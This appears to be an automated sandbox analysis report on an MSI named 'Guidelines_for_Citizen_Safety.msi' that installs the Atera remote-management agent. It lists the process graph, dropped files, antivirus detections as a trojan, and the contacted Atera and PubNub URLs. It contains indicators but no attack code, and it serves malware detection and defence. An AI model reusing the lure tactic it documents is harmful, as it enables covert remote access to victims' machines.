                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561804 Sample: Guidelines_for_Citizen_Safety.msi Startdate: 24/11/2024 Architecture: WINDOWS Score: 88 97 windowsupdatebg.s.llnwi.net 2->97 99 time.windows.com 2->99 101 9 other IPs or domains 2->101 109 Multi AV Scanner detection for dropped file 2->109 111 Multi AV Scanner detection for submitted file 2->111 113 Yara detected AteraAgent 2->113 115 3 other signatures 2->115 9 msiexec.exe 82 43 2->9         started        12 AteraAgent.exe 2->12         started        16 msiexec.exe 5 2->16         started        signatures3 process4 dnsIp5 81 C:\Windows\Installer\MSIA9F5.tmp, PE32 9->81 dropped 83 C:\Windows\Installer\MSI87B3.tmp, PE32 9->83 dropped 85 C:\Windows\Installer\MSI7013.tmp, PE32 9->85 dropped 95 20 other files (17 malicious) 9->95 dropped 18 AteraAgent.exe 6 11 9->18         started        22 msiexec.exe 9->22         started        24 msiexec.exe 9->24         started        103 d25btwd9wax8gu.cloudfront.net 108.158.75.93, 443, 49796 AMAZON-02US United States 12->103 105 ps.pndsn.com 13.232.67.198, 443, 49768, 49771 AMAZON-02US United States 12->105 107 agent-api.atera.com 12->107 87 C:\...87ewtonsoft.Json.dll, PE32 12->87 dropped 89 C:\...\Atera.AgentPackage.Common.dll, PE32 12->89 dropped 91 C:\...\AgentPackageAgentInformation.exe, PE32 12->91 dropped 93 AgentPackageAgentInformation.exe.config, XML 12->93 dropped 123 Creates files in the system32 config directory 12->123 125 Reads the Security eventlog 12->125 127 Reads the System eventlog 12->127 26 AgentPackageAgentInformation.exe 12->26         started        28 sc.exe 12->28         started        30 AgentPackageAgentInformation.exe 12->30         started        32 AgentPackageAgentInformation.exe 12->32         started        file6 signatures7 process8 file9 59 C:\Windows\System32\InstallUtil.InstallLog, Unicode 18->59 dropped 61 C:\...\AteraAgent.InstallLog, Unicode 18->61 dropped 117 Creates files in the system32 config directory 18->117 119 Reads the Security eventlog 18->119 121 Reads the System eventlog 18->121 34 rundll32.exe 15 9 22->34         started        37 rundll32.exe 7 22->37         started        39 rundll32.exe 8 22->39         started        41 rundll32.exe 22->41         started        51 2 other processes 24->51 43 conhost.exe 26->43         started        45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        signatures10 process11 file12 63 C:\...\AlphaControlAgentInstallation.dll, PE32 34->63 dropped 73 3 other files (none is malicious) 34->73 dropped 65 C:\...\AlphaControlAgentInstallation.dll, PE32 37->65 dropped 75 3 other files (none is malicious) 37->75 dropped 67 C:\...\AlphaControlAgentInstallation.dll, PE32 39->67 dropped 77 3 other files (none is malicious) 39->77 dropped 69 C:\...\AlphaControlAgentInstallation.dll, PE32 41->69 dropped 71 C:\Windows\...\System.Management.dll, PE32 41->71 dropped 79 2 other files (none is malicious) 41->79 dropped 53 conhost.exe 51->53         started        55 conhost.exe 51->55         started        57 net1.exe 1 51->57         started        process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Guidelines_for_Citizen_Safety.msi29%ReversingLabsWin32.Trojan.Atera

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe26%ReversingLabsWin32.Trojan.Atera
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll0%ReversingLabs
                              C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll0%ReversingLabs
                              C:\Windows\Installer\MSI6A36.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll0%ReversingLabs
                              C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Windows\Installer\MSI6A36.tmp-\System.Management.dll0%ReversingLabs
                              C:\Windows\Installer\MSI7013.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll0%ReversingLabs
                              C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Windows\Installer\MSI7013.tmp-\System.Management.dll0%ReversingLabs
                              C:\Windows\Installer\MSI87B3.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll0%ReversingLabs
                              C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Windows\Installer\MSI87B3.tmp-\System.Management.dll0%ReversingLabs
                              C:\Windows\Installer\MSI8A93.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI8B30.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI8C79.tmp0%ReversingLabs
                              C:\Windows\Installer\MSIA9F5.tmp0%ReversingLabs
                              C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll0%ReversingLabs
                              C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll0%ReversingLabs
                              C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dll0%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://agent-api.aterDZ0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ps.pndsn.com
                              		13.232.67.198
                              		truefalse
                                		high
                                bg.microsoft.map.fastly.net
                                		199.232.210.172
                                		truefalse
                                  		high
                                  s-part-0035.t-0009.t-msedge.net
                                  		13.107.246.63
                                  		truefalse
                                    		high
                                    d25btwd9wax8gu.cloudfront.net
                                    		108.158.75.93
                                    		truefalse
                                      		unknown
                                      fp2e7a.wpc.phicdn.net
                                      		192.229.221.95
                                      		truefalse
                                        		high
                                        windowsupdatebg.s.llnwi.net
                                        		178.79.238.0
                                        		truefalse
                                          		high
                                          ps.atera.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            agent-api.atera.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              time.windows.com
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                  		high
                                                  https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                    		high
                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                      		high
                                                      https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                        		high
                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                          		high
                                                          https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                            		high
                                                            https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                              		high
                                                              https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                		high
                                                                https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                  		high
                                                                  https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                    		high
                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                      		high
                                                                      https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                        		high
                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                          		high
                                                                          https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                            		high
                                                                            https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                              		high
                                                                              https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                		high
                                                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                  		high
                                                                                  https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcvfalse
                                                                                    		high
                                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                      		high
                                                                                      https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                        		high
                                                                                        https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                          		high
                                                                                          https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                            		high
                                                                                            https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2false
                                                                                              		high

                                                                                              URLs from Memory and Binaries

                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              https://ps.atera.com/agentpackagesmac/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zipAteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://agent-api.atera.com/Production/Agent/GetRecurringPackagesckNTIALBACKOFF02ceca8-a958-11e5-bd8AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.datacontract.orgAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://agent-api.atera.com/Production/Agent/GetCommands)AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://dl.google.com/googletalk/googletalk-setup.exeAgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.drfalse
                                                                                                            		high
                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageA0HAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ps.pndsn.com/v2/presence/sub_key/subXAteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://agent-api.atera.com/Production/Agent/rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drfalse
                                                                                                                      		high
                                                                                                                      http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://wixtoolset.orgrundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drfalse
                                                                                                                          		high
                                                                                                                          https://agent-api.atera.com/ProductionAgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://agent-api.aterDZrundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/20AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://acontrol.atera.com/AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe.2.drfalse
                                                                                                                                  		high
                                                                                                                                  https://agent-api.atera.com/Production/Agent/AgentStarting)AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://ps.pndsn.comAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27cAteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscoveAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://agent-api.atera.comrundll32.exe, 00000005.00000002.1451460309.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC5082F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C45371F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC417F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.8/AgentPackageSystemTools.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.datacontract.org/2004/07/AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/icsharpcode/SharpZipLibAteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentIAteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
